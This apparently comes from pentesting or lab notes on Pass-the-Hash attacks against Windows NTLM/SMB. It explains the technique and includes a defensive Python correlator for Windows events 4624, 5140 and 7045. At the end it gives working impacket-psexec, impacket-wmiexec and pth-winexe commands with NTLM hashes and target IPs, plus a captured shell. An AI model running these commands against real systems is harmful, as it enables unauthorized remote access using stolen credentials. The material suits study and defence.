Pass The Hash

Pass The Hash Attack

The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the associated plaintext password. Note that this does not work against Kerberos authentication, only against servers or services that accept NTLM authentication.

Many third-party tools and frameworks use PtH to allow users to both authenticate and obtain code execution, including PsExec from Metasploit, Passing-the-hash toolkit, and Impacket. The mechanics behind them are more or less the same in that the attacker connects to the victim using the Server Message Block (SMB) protocol and performs authentication using the NTLM hash.

Most tools built to exploit PtH create and start a Windows service (for example cmd.exe or an instance of PowerShell) and communicate with it using named pipes. This is done using the Service Control Manager API.

This technique requires an SMB connection through the firewall (commonly port 445), and the Windows File and Print Sharing feature to be enabled. These requirements are common in internal enterprise environments.

When a connection is performed, it normally uses a special admin share called Admin$. In order to establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.
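The three requirements just described (an NTLM network logon, a connection to the ADMIN$ share, and a service created through the Service Control Manager) each leave a Windows event: 4624 with LogonType 3 and AuthenticationPackageName NTLM, 5140 for the share access, and 7045 in the System log for the new service. A single NTLM logon is not evidence of anything, but the three together within a short window is the footprint of PsExec-style lateral movement. The following is an added example, not code from the page or from any of the tools named; the events are constructed sample records whose field names mirror the Windows event fields, and the service name and time window are assumptions.

```python
"""Correlate constructed Windows events into a PsExec-style lateral movement finding."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4624 = logon, 5140 = share accessed,
# 7045 = service installed. Times are ISO-8601 strings.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "event_id": 4624, "host": "WS01", "user": "Administrator",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.11.0.4"},
    {"time": "2024-05-01T10:00:02", "event_id": 5140, "host": "WS01", "user": "Administrator",
     "share": "\\\\*\\ADMIN$", "src_ip": "10.11.0.4"},
    {"time": "2024-05-01T10:00:03", "event_id": 7045, "host": "WS01", "user": "Administrator",
     "service_name": "svc-example", "image_path": "%SystemRoot%\\svc-example.exe"},  # constructed name
    # Benign: an NTLM logon to an ordinary file share, no ADMIN$ and no service install.
    {"time": "2024-05-01T11:15:00", "event_id": 4624, "host": "FS01", "user": "alice",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.11.0.50"},
    {"time": "2024-05-01T11:15:01", "event_id": 5140, "host": "FS01", "user": "alice",
     "share": "\\\\*\\Projects", "src_ip": "10.11.0.50"},
    # Benign: a service installed by a local interactive session, no network logon.
    {"time": "2024-05-01T12:00:00", "event_id": 7045, "host": "WS02", "user": "bob",
     "service_name": "UpdaterSvc", "image_path": "C:\\Program Files\\Updater\\svc.exe"},
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def find_pth_lateral_movement(events, window_seconds=60):
    """Return one finding per NTLM network logon that is followed, within the
    window and on the same host by the same account, by ADMIN$ access and a
    new service install."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["host"], e["user"])].append(e)

    findings = []
    for (host, user), evs in by_key.items():
        evs.sort(key=_t)
        for logon in evs:
            if not (logon["event_id"] == 4624 and logon.get("logon_type") == 3
                    and logon.get("auth_package") == "NTLM"):
                continue
            t0 = _t(logon)
            window = [e for e in evs if t0 <= _t(e) <= t0 + timedelta(seconds=window_seconds)]
            admin_share = any(e["event_id"] == 5140 and e.get("share", "").upper().endswith("ADMIN$")
                              for e in window)
            services = [e for e in window if e["event_id"] == 7045]
            if admin_share and services:
                findings.append({
                    "host": host, "user": user, "src_ip": logon["src_ip"], "time": logon["time"],
                    "service": services[0]["service_name"], "image": services[0]["image_path"],
                    "reason": "NTLM network logon + ADMIN$ access + new service within window",
                })
    return findings


if __name__ == "__main__":
    for f in find_pth_lateral_movement(SAMPLE_EVENTS):
        print(f)
```

Two practical caveats: 5140 only appears when object-access auditing for file shares is enabled on the target, and 7045 lives in the System log rather than Security, so the collector must forward both. The logon event itself looks identical whether the hash was typed in or passed from a dump; the correlation with the share and the service is what makes the finding, and the source IP from 4624 is the pivot to the attacker's foothold.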

Note that PtH uses the NTLM hash legitimately. However, the vulnerability lies in the fact that we gained unauthorized access to the password hash of a local administrator.

To extract hashes for a pass the hash, see the Dumping SAM section or the DCSync section.

Impacket-psexec

You can use impacket-psexec to pass the hash to the winrm service:

impacket-psexec offsec.local/Administrator:@192.168.143.59 -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5

Examples: Sizzle, Sauna

Impacket-wmiexec

impacket-wmiexec htb.local/Administrator@10.10.10.103 -hashes :f6b7160bfc91823792e0ac3a162c9267

Examples: Sizzle

pth-winexe

We can use pth-winexe from the Passing-The-Hash toolkit, just as we did when we passed the hash to a non-domain joined user in the Password Attacks module:

kali@kali:~$ pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>